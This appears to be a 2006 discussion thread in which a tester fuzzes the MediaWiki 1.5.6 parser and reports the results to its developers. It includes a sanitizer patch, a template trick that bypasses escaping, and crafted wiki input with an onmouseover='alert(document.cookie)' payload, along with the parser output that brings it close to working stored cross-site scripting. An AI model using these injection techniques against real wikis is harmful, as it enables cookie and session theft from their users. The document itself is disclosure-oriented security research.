- Why does MediaWiki ever allow unescaped ">" characters? This
behaviour seem to increase the chances of a JavaScript security problem.
It doesn't, modulo uncaught bugs.
Well, all I can tell you is that this is the behaviour that I observe.
But you don't have to take my word for it; see for yourself here: * Unescaped ">" characters in the HTML output: http://nickj.org/MediaWiki/Parser11 * Wiki Source: http://nickj.org/Special:Export/MediaWiki/Parser11 * Site is running MediaWiki 1.5.6: http://nickj.org/Special:Version
Note that I'm looking at the Parser purely from a black-box-testing perspective: I give it certain input, and observe what it does. I'm not looking at it from a source-code or design-level perspective (i.e. what it should do). Then as a human, I automatically try to spot the patterns in the behaviour that I observe, and from that construct a mental model that explains what the Parser is doing. And currently that says: the ">" character does not appear to be escaped until after the "<" character is used.
Disclaimer: I have modified the MediaWiki source of this installation a little, but only to add limited ACLs, and change 2 or 3 minor things in the default page layout that I disliked. As far as I am aware, nothing that I have changed will modify the behaviour of the Parser (but of course, I could be wrong).
This is thanks to the wacky multi-pass parser. As a quick hack-around:
--- includes/Sanitizer.php.prev 2006-03-30 23:50:58.000000000 -0800 +++ includes/Sanitizer.php 2006-03-30 23:48:59.000000000 -0800 @@ -577,6 +577,9 @@ # Templates and links may be expanded in later parsing, # creating invalid or dangerous output. Suppress this. $value = strtr( $value, array(
'<' => '<', // This should never happen,
'>' => '>', // we've received invalid input
'"' => '"', // which should have been escaped.
Question: will this break wikis with $wgRawHtml on? (Used to embed arbitrary HTML.)
Also, thank you, because the above code snipped suggested a way to prevent the "'>' character does not appear to be escaped until after the '<' character is used" restriction.
What you do is use templates, and then we can completely bypass this restriction.
E.g. whereas before if we had one article, with wiki text like this: ------------------------------------
{| BGCOLOR=<span style="font-weight: bold;">
------------------------------------
... then it would produce HTML output like this: ------------------------------------ <p>>>>>> </p> <table bgcolor="<span"> >>>>>
</span>
</table> ------------------------------------
Instead, we now have one article, and one template. For the template (call it "Template:OpenTag") we have: ------------------------------------ {| BGCOLOR=<span style="font-weight: bold;"> ------------------------------------
Then in the article we have: ------------------------------------
{{OpenTag}}
------------------------------------
Which now renders as this HTML output: ------------------------------------ <p>>>>>> </p> <table bgcolor="<span">
------------------------------------
Note that the second ">>>>>" is no longer escaped now, despite the "<" being included in the HTML output based on user-supplied input.
Maybe it'll come in useful and maybe it won't, but either way it's one less restriction.
Hi Nick - very interesting post :) I don't know anything of how MediaWiki works, but I'm curious why you're allowed HTML of the form <U>aoeu</U>. How does that work, and will that help your nefarious goal?
Well the "<U>aoeu</U>" might help, if we could get the Parser to start an underline tag, but not close it.
For example, if we could come up with some wiki-text input that would produce this output: ------------------------------------ <U foo=" <p>Some text</p> " onmouseover="alert(document.cookie)">test</u> ------------------------------------
In other words, we want "<U", not "<U>" in the output. I.e. we want to confuse the Parser, to get it to stuff up the normal flow of tags in the HTML output, and start something that it doesn't finish.
Note that enabling Tidy probably won't provide any protection here. In fact, it may even make things worse, by adding in tags for us. For example, if we can get this output (i.e. same as above, but missing "</u>"): ------------------------------------ <U foo=" <p>Some text</p> " onmouseover="alert(document.cookie)">test ------------------------------------
Then Tidy will helpfully supply it for us, and clean things up a little, which will give us this: ------------------------------------ <u foo="<p>Some text</p>" onmouseover="alert(document.cookie)">test</u> ------------------------------------
And then the browser will ignore the attributes it doesn't understand, giving this: ------------------------------------ <u onmouseover="alert(document.cookie)">test</u> ------------------------------------
... which will allow us to execute JavaScript. So, it was really the '<U foo="' bit that I was looking for.
Through automated fuzz-style testing, I've since found something that behaves in almost exactly this way (which demonstrates that if you throw enough fuzz-style input at something, you'll probably get it to squeal). In particular, this wiki input: ------------------------------------ {| | |[ftp://|x||] ------------------------------------
... generates this output: ------------------------------------ <table> <tr> <td><a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a> ------------------------------------
... which looks OK, until you look closer: ------------------------------------ <a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a> ------------------------------------ ^OPEN-QUOTES ^CLOSE-QUOTES ^OPEN-QUOTES-AGAIN (... and then never closes them) Somewhere in between the first OPEN-QUOTES and the CLOSE-QUOTES, the MediaWiki Parser loses full control of the situation, because the "external" and "free" bits here are being treated as HTML attributes, and I can be quite sure that the MediaWiki folks never intended for that to happen (what they wanted was for these to be treated as the _value_ of an HTML attribute).
We can then add the onmouseover stuff to the wiki input: ------------------------------------ {| | |[ftp://|x||]" onmouseover="alert(document.cookie)">test ------------------------------------
... Then this results in the Parser giving us this output: ------------------------------------ <table> <tr> <td><a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test ------------------------------------ (Above output+input available online at: http://nickj.org/MediaWiki/Parser12 and http://nickj.org/Special:Export/MediaWiki/Parser12 )
The above output is exceedingly close to what we want. In fact, at this stage, we've solved all the previous problems, but unfortunately we've come across one last unexpected new problem: the 'class="external free"' stuff. For example, if we could get it to be this (i.e. one extra "=" symbol at the end of the class string): ------------------------------------ <td><a href="ftp://|x</td><td class="external free=">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test ------------------------------------
.... Then tidy will convert it to this: ------------------------------------ <a href="ftp://|x%3C/td%3E%3Ctd%20class=" external="" free=">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test</a> ------------------------------------
.... which will work. So, we're one "=" away from success. Either that, or find a way to remove the 'class="external free"' bit, which will also work. Or, find a way to delay it until after the onmouseover, and that will also work. Or, find a way to make it use single quotes instead of double quotes for the class (i.e. class='external free', rather than class="external free"), and that will work too.
So there are at least 4 possibilities, only one of which has to work.
Again, if anyone knows of a way to do any of these, or improve on the above, then please let me know.
your nefarious goal
I'd feel a whole lot more nefarious if I wasn't telling the MediaWiki people all about it, and thereby suggesting ways of making such attacks harder ;-)
All the best, Nick.